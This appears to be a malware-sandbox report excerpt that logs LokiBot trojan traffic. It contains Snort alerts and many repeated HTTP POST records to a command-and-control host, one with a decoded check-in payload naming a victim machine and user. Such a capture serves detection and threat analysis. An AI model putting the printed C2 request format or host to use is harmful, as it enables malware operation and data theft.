                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49806
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49807
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49809
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49810
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49812
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49814
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49815
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49817
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49818
                    Source: Joe Sandbox View, ASN Name: ASBAXETRU ASBAXETRU
                    Source: global traffic, HTTP traffic detected:
                        POST /candy/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: nevomw.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: F1D39DE6
                        Content-Length: 196
                        Connection: close
                    Source: global traffic, HTTP traffic detected:
                        POST /candy/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: nevomw.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: F1D39DE6
                        Content-Length: 169
                        Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global traffic
                    HTTP traffic detected: POST /candy/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: nevomw.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: F1D39DE6
                    Content-Length: 169
                    Connection: close
                    Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                    Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
